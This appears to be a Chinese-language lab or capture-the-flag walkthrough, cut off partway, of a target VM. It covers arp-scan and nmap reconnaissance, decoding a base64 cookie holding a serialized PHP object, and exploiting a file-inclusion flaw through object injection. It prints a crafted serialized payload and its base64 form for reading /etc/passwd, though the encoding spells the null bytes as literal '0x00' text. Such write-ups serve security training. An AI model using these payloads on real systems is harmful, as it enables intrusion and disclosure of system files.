1.扫描靶机ip
arp-scan -l
2.扫描开放的端口
nmap -sV -p- 192.168.187.134
发现开放了80,22端口
访问web服务
bp抓包,发现cookie是经过base64加密的解密
解密后发现是经过序列化的
O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}
O: 代表存储的是对象(object),如果传入的是一个数字,那它就会变成a;
4: 表示对象的名称有4个字符,User表示对象名称刚好4个字符;
2: 表示有两个值
s: 表示字符串,数字表示字符串长度
3.扫描目录发现/backup/,访问
4.下载bak.zip发现三个源代码
查看后发现user.class.php文件存在文件包含漏洞,可以构造payload加以利用输出信息
5.构造payload读取/etc/passwd文件,将空格改为\x00
O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}
进行base64加密
Tzo0OiJVc2VyIjoyOntzOjEwOiIweDAwVXNlcjB4MDBuYW1lIjtzOjM6InNrNCI7czo5OiIweDAwVXNlcjB4MDB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=
5.抓包
预知后续如何,敬请期待下集